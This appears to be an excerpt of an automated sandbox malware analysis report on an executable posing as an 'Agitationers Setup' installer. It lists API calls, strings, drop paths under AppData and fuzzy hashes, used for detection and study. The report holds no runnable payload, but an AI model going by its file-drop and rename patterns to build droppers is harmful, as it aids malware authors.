GetDlgItem.USER32(?,000003F9), ref: 00404A5C
GetDlgItem.USER32(?,00000408), ref: 00404A67
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
LoadBitmapA.USER32(0000006E), ref: 00404AC4
SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
DeleteObject.GDI32(00000000), ref: 00404B3A
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
GetWindowLongA.USER32(?,000000F0), ref: 00404C74
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
ShowWindow.USER32(?,00000005), ref: 00404C93
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
GlobalFree.KERNEL32(00000000), ref: 00404E73
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
ShowWindow.USER32(?,00000000), ref: 00405012
GetDlgItem.USER32(?,000003FE), ref: 0040501D
ShowWindow.USER32(00000000), ref: 00405024

Strings

, xrefs: 00404FFC
M, xrefs: 00404BED
N, xrefs: 00404CCE

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58

Function 004044D1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404520
SetWindowTextA.USER32(00000000,?), ref: 0040454A
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
CoTaskMemFree.OLE32(00000000), ref: 00404606
lstrcmpiA.KERNEL32(: Completed,Agitationers Setup: Completed), ref: 00404638
lstrcatA.KERNEL32(?,: Completed), ref: 00404644
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656

Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3

Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
Part of subcall function 0040620A: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F

Part of subcall function 00404888: lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941

Strings

Agitationers Setup: Completed, xrefs: 004045CE, 00404631
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank, xrefs: 00404621
A, xrefs: 004045F4
: Completed, xrefs: 00404632, 00404637, 00404642
Triu,fe$, xrefs: 004044EA

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$Agitationers Setup: Completed$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Triu,fe$
API String ID: 2624150263-2786071686
Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D

Function 00405768 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
FindClose.KERNEL32(00000000), ref: 004058CF

Strings

\*.*, xrefs: 004057D3
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00405768
C:\Users\user\AppData\Local\Temp\, xrefs: 00405775

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3971466533
Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
API String ID: 123533781-1999411507
Opcode ID: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
Instruction ID: e240bf9bd5167367365347af51bd1272e3bc3770d4ab5d97d329ed4db4fc5742
Opcode Fuzzy Hash: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
Instruction Fuzzy Hash: 81510771A00208BFCF10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54

Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
Opcode Fuzzy Hash: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A

Function 0040677D Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
Instruction ID: 39e82714288353bf73825cbb988a8a6af090c2e25faa9df829ed1fe8e01e3ef1
Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
Instruction Fuzzy Hash: CFE18A71900706DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1E738AA91CF54

Function 00406F54 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95

Function 004041AA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
GetDlgItem.USER32(00000000,000003E8), ref: 00404249
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
GetSysColor.USER32(?), ref: 00404278
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
lstrlenA.KERNEL32(?), ref: 00404299
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
GetDlgItem.USER32(?,0000040A), ref: 0040431F
SendMessageA.USER32(00000000), ref: 00404322
GetDlgItem.USER32(?,000003E8), ref: 0040434D
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
SetCursor.USER32(00000000), ref: 004043A5
LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
SetCursor.USER32(00000000), ref: 004043BE
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE

Strings

uA@, xrefs: 004043A9
: Completed, xrefs: 00404378
N, xrefs: 0040433B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N$uA@
API String ID: 3103080414-130251812
Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Agitationers Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Agitationers Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Agitationers Setup$F
API String ID: 941294808-1687728078
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49

Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
wsprintfA.USER32 ref: 00405C84
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
GlobalFree.KERNEL32(00000000), ref: 00405D6D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Strings

[Rename], xrefs: 00405CEE, 00405D00
%s=%s, xrefs: 00405C7A

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD

Function 0040620A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
CharNextA.USER32(?,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

Strings

*?|<>/":, xrefs: 00406252
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00406246
C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2589227440
Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
